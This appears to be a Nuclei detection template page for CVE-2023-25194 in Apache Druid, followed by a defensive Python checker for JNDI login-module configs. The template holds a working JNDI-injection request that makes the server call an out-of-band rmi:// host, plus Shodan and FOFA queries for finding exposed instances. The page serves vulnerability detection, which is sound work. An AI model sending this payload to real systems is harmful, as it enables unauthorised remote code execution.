Apache Druid Kafka Connect - Remote Code Execution
ID: CVE-2023-25194
Severity: high
Author: j4vaovo
Tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast
Description
The vulnerability allows a remote, authenticated attacker to run arbitrary code on the system. It is caused by unsafe deserialization that occurs while a connector is configured through the Kafka Connect REST API.
YAML Source
id: CVE-2023-25194

info:
  name: Apache Druid Kafka Connect - Remote Code Execution
  author: j4vaovo
  severity: high
  description: |
    The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25194
    - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
    - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html
    - https://kafka.apache.org/cve-list
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-25194
    cwe-id: CWE-502
    epss-score: 0.96717
    epss-percentile: 0.99653
    cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: kafka_connect
    shodan-query:
      - html:"Apache Druid"
      - http.html:"apache druid"
    fofa-query: body="apache druid"
  tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "type":"kafka",
          "spec":{
            "type":"kafka",
            "ioConfig":{
              "type":"kafka",
              "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
              },
              "topic":"test",
              "useEarliestOffset":true,
              "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                  "raw"
                ]
              }
            },
            "dataSchema":{
              "dataSource":"sample",
              "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
              },
              "dimensionsSpec":{
              },
              "granularitySpec":{
                "rollup":false
              }
            },
            "tuningConfig":{
              "type":"kafka"
            }
          },
          "samplerConfig":{
            "numRows":500,
            "timeoutMs":15000
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'RecordSupplier'

      - type: status
        status:
          - 400
# digest: 4a0a0047304502210083faa4108e70b964f25a243a77f470b67cf15d27714b45436be785cff50149290220327bcbb189715345fa506f9d5c903f32f0c0904ae3ab8d6ed2fc58fef23e90cc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used with the Nuclei tool to detect the vulnerability described above by sending the request it defines and matching the response patterns and out-of-band interaction it expects.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-25194.yaml"
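As an added defensive example (not part of this template, nor Druid or Kafka code), the following Python inspects a sampler request body of the shape shown above and flags consumerProperties whose sasl.jaas.config names a JNDI login module or points a *.provider.url at a remote scheme, so a gateway or log-review job can alert on such requests before or after the fact. The module name and scheme lists, the function names and the sample body are this example's own assumptions; Kafka 3.4.0 and later reject JndiLoginModule by default through the org.apache.kafka.disallowed.login.modules system property, which is the vendor-side fix this check mirrors.

```python
import json
import shlex
from urllib.parse import urlsplit
# Login modules that must never appear in a client-supplied sasl.jaas.config;
# Kafka 3.4.0+ rejects JndiLoginModule by default via the
# org.apache.kafka.disallowed.login.modules system property.
DISALLOWED_LOGIN_MODULES = {"com.sun.security.auth.module.JndiLoginModule"}
REMOTE_SCHEMES = {"rmi", "ldap", "ldaps", "iiop", "dns"}  # JNDI remote lookups

def _walk(node):
    """Yield every dict nested anywhere inside a parsed JSON document."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)

def find_jndi_jaas(body: str) -> list[str]:
    """Report sasl.jaas.config entries in a Druid sampler/supervisor JSON body that
    name a disallowed login module or aim a *.provider.url at a remote JNDI scheme."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON: nothing to inspect at this layer
    for mapping in _walk(doc):
        jaas = mapping.get("sasl.jaas.config")
        if not isinstance(jaas, str):
            continue
        findings += [f"disallowed login module {m}"
                     for m in sorted(DISALLOWED_LOGIN_MODULES) if m in jaas]
        try:
            tokens = shlex.split(jaas.replace(";", " "))  # also strips the quotes
        except ValueError:  # unbalanced quotes: fall back to a plain split
            tokens = jaas.split()
        for token in tokens:
            key, sep, url = token.partition("=")
            if sep and key.endswith(".provider.url") \
                    and urlsplit(url).scheme.lower() in REMOTE_SCHEMES:
                findings.append(f"remote provider url {url}")
    return findings

# Constructed sample in the shape of the sampler request above, with a placeholder callback host.
SAMPLE_BODY = json.dumps({"type": "kafka", "spec": {"ioConfig": {"consumerProperties": {
    "bootstrap.servers": "127.0.0.1:6666",
    "sasl.jaas.config": 'com.sun.security.auth.module.JndiLoginModule required '
                        'user.provider.url="rmi://callback.example:6666/test" '
                        'useFirstPass="true" group.provider.url="xxx";'}}}})
```

A body that uses an ordinary login module such as PlainLoginModule, or whose provider URLs carry no remote scheme, yields an empty list.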